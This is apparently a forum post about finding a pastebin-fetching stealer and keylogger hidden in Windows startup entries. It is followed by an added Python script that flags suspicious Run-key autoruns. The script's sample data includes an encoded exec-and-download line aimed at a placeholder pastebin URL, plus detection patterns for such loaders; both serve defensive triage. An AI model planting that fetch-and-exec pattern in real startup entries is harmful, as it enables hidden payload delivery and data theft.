u/HowToCantaloupe

I found a crypto stealer and keylogger on my PC just by looking through Windows startup apps. What next?

I stumbled upon a very suspicious-looking script when looking at the startup apps in the registry editor, running a python file full of obfuscated, b64-encoded code. So I decoded it, found it was downloading a payload from pastebin, and eventually found after a couple more steps it would run a crypto stealer and keylogger script.

So obviously I've deleted the program and restarted my PC. But what now? I don't use crypto, so I'm fine there. I'm going to go and change all my passwords (on another device just in case), but what else should I be doing to make sure I'm in the clear? Is a full wipe of the PC needed? Malwarebytes scans don't detect anything, but they already didn't detect this when it was there, and my PC was infected for at least a few weeks based on the script's Last Modified date.

u/HowToCantaloupe — 3 days ago
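As an added example (not code from the original post), a heuristic triage pass over Windows Run-key autorun entries of the kind the poster found: it flags entries that launch a script interpreter, run from user-writable paths, or carry base64 literals that decode to download/exec code. The registry values here are constructed stand-ins; on a real machine the same `scan` function can be fed the name/value pairs read from the HKCU and HKLM `...\CurrentVersion\Run` keys.

```python
import base64
import re

# Constructed stand-in for the values of HKCU/HKLM ...\CurrentVersion\Run.
# The "payload" below is a harmless constructed string; it is never executed.
_PAYLOAD = base64.b64encode(
    b"import urllib.request as u;u.urlopen('https://pastebin.com/raw/PLACEHOLDER')").decode()
SAMPLE_RUN_ENTRIES = {
    "OneDrive": r'"C:\Users\me\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "SecurityHealth": r"C:\Windows\system32\SecurityHealthSystray.exe",
    "WinUpdate": r"C:\Users\me\AppData\Local\Programs\Python\Python311\pythonw.exe C:\Users\me\AppData\Roaming\svc.py",
    "Helper": f"pythonw.exe -c \"import base64;exec(base64.b64decode('{_PAYLOAD}'))\"",
}

INTERPRETERS = re.compile(r"\b(pythonw?|powershell|pwsh|wscript|cscript|mshta|cmd)(\.exe)?\b", re.I)
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|ProgramData)\\", re.I)
B64_LITERAL = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
SUSPECT_TEXT = re.compile(r"(b64decode|exec\(|pastebin\.com|https?://)", re.I)

def decode_b64_literals(command):
    """Return the UTF-8 text of every long base64-looking literal in a command line."""
    decoded = []
    for m in B64_LITERAL.finditer(command):
        try:
            decoded.append(base64.b64decode(m.group(0), validate=True).decode("utf-8"))
        except Exception:
            continue  # not real base64, or not text: ignore it
    return decoded

def assess_entry(name, command):
    """Score one autorun entry; every matched heuristic adds a human-readable reason."""
    reasons = []
    if INTERPRETERS.search(command):
        reasons.append("launches a scripting interpreter at startup")
    if USER_WRITABLE.search(command):
        reasons.append("runs from a user-writable directory")
    if SUSPECT_TEXT.search(command):
        reasons.append("command line contains decode/exec/download markers")
    for text in decode_b64_literals(command):
        if SUSPECT_TEXT.search(text):
            reasons.append("embedded base64 decodes to: " + text[:60])
    return {"name": name, "command": command, "reasons": reasons}

def scan(entries):
    """Return entries matching at least two heuristics, most suspicious first."""
    results = [assess_entry(n, c) for n, c in entries.items()]
    flagged = [r for r in results if len(r["reasons"]) >= 2]
    return sorted(flagged, key=lambda r: -len(r["reasons"]))
```

Calling `scan(SAMPLE_RUN_ENTRIES)` flags the two python-launching entries and leaves the signed vendor binaries alone; the decoded-base64 reason is what exposes the pastebin downloader without running anything.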